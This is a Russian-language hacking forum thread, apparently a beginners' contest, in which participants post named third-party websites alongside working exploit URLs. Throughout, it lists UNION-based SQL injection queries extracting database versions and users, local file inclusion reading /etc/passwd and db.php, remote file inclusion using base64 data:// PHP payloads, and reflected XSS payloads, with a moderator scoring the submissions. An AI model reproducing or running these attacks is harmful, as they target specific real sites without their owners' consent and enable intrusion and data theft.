Конкурс уязвимостей для новичков

PHP:

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,version()

Автор, скажите пожалуйста версию, и где вывод

 

Кстати не одну из уезвимостей не брал на этом сайте http://pastebin.com/
Искал через софт !

 

Вывод в исходном коде.

Code:

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,44444444444

Нажимаем ctrl+f и ищем 4444444
Нашли на 473 строке

Code:

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%20111111111111111,22222222222,333333333333,version()

выдает нам на 473 строке

Code:

<SCRIPT language=JavaScript>var image2 = new Image();image2.src = 'http://www.immospaze.de/images/5.1.73-community';

 

Вы же не автор. вывод подключаемой картинке срц=вывод . Мне просто иногда кажется что...

 

Сайт:http://www.cqtailian.com/
Уязвимость:SQLi
Эксплойт:

Code:

http://www.cqtailian.com/Content.php?categoryid=999999.9%20union%20all%20select%20999,2,3,4,5

 

а вот тут вывода нет.

 

Сайт: http://jithubhq.microbold.net/tutorials/php/tutorials.php?id=11
Уязвимость: SQLi
Эксплойт: http://jithubhq.microbold.net/tutorials/php/tutorials.php?id=-11 UNION SELECT @@Version,2,3,4 --

 

Сайт:http:www.brzozo.com
Уязвимость:Local File Reading
Эксплойт:

Code:

http://www.brzozo.com/force-download.php?file=/etc/passwd
http://www.brzozo.com/force-download.php?file=db.php
http://www.brzozo.com/popup.php
http://www.brzozo.com/popup.php?id=1

Так принимается?

 

принимается, однако в гугле уже эта уязвимость есть, а касаемо повторов есть правило

 

Сайт:www.stateofemergencyltd.com
Уязвимость:SQLi
Эксплойт:

Code:

http://www.stateofemergencyltd.com/news.php?id=999999.9 union all select 1,[t],3,4,5,6,7

Сайт:www.upani.com
Уязвимость:SQLi
Эксплойт:

Code:

http://www.upani.com/productinfo.php?pid=85' and [t] and '1'='1&cid=5&psid=rajpur-collection-invitation-box

Cайт:www.corpsport.com
Уязвимость:SQLi
Эксплойт:

Code:

http://www.corpsport.com/productDetails.php?id=999999.9 union all select 1,[t],3,4,5

Cайт:www.immobilien-niederzier.com
Уязвимость:SQLi
Эксплойт:

Code:

http://www.immobilien-niederzier.com/view_detail.php?siteid=999999.9%20union%20all%20select%201,2,3,[t]

 

Сайт: http://www.karnaticlabrecords.com/artists.php?id=32
Уязвимость: SQLi
Эксплойт:
http://www.karnaticlabrecords.com/a...CAT(MID(VERSION(), 1, 63), FLOOR(RAND(0)*2)))

 

всем добавил. sqli из паблика не зачтены.

 

для тех, кто уже прошел (на данный момент это только @3nvY). предлагаю повысить свой скилл, найдя все уязвимости из списка. это шанс проявить себя и разобраться с основным типом уязвимостей.

 

Сайт: hfboapps.ucr.edu
Уязвимость: LFI
Эксплойт:

Code:

http://fboapps.ucr.edu/policies/index.php?path=/etc/passwd

Сайт: www.gamsc.com
Уязвимость: LFI
Эксплойт:

Code:

http://www.gamsc.com/index.php?filename=../../../../../../../etc/passwd

Сайт: www.mycklaflon.se
Уязвимость: RFI
Эксплойт:

Code:

www.mycklaflon.se/index1.asp?page=http://www.vk.com

 

не RFI, но IFRAME Injection

 

1)Сайт: http://www.felixfilm.se/film.php?id=77
Уязвимость: SQLi
Эксплойт: http://www.felixfilm.se/film.php?id=-77 UNION SELECT 1,version(),3,user(),5,6,7,8,9,10 --

2)Сайт: http://prontowash.com/usa/location.php?id=2
Уязвимость: SQLi
Эксплойт: http://prontowash.com/usa/location.php?id=-2 UNION SELECT 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15--

3)Сайт: http://www.comtecwash.com/photos.php?id=1
Уязвимость: SQLi
Эксплойт: http://www.comtecwash.com/photos.php?id=-1 UNION SELECT 1,2,3,4,version(),6,7,8,9,10--

4)Сайт: http://odessa-life.od.ua
Уязвимость: XSS
Эксплойт: http://odessa-life.od.ua/gue/search
P.S В поиске: <script>alert('1')</script>

5)Сайт: http://mapexpert.com.ua/index_ru.php?id=67&table=news
Уязвимость: SQLi
Эксплойт: http://mapexpert.com.ua/index_ru.php?id=-67+union+select+1,2,version(),4,5,6,7,8,9,10+--+&table=news
P.S Там еще и XSS уязвимость есть: вместо 3,5 или 7 подставляем <script>alert('antichat.ru')</script>

6)Сайт: http://prokudin-gorskiy.ru
Уязвимость: XSS
Эксплойт: http://prokudin-gorskiy.ru/search.php?send=on&scope=1&key=<script>alert('antichat.ru')</script>

 

Сайт: www.walkandtrain.com
Уязвимость: RFI
Эксплоит:

Code:

http://www.walkandtrain.com/index.php?x=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Сайт: railusers.net
Уязвимость: RFI
Эксплоит:

Code:

http://railusers.net/index.php?link=data://text/plain;base64,PD9waHAgcGhwaW5mbygpOyA%2FPg%3D%3D

Подскажите пожалуйста где почитать инфу по Local File Reading(LFR). На ачате и в гугле чёт не могу найти.

 

да тут ничего особенного. просто чтение локальных файлов. в php это readfile, file_get_contents и т. д. никаких особых фишек там нет, разве что некоторые функции поддерживают нуль-байт

 

То есть это не RFI, или это ответ на мой вопрос. Сори за оффтоп я немного туго мыслящий

 

ответ на вопрос. но да, это RFI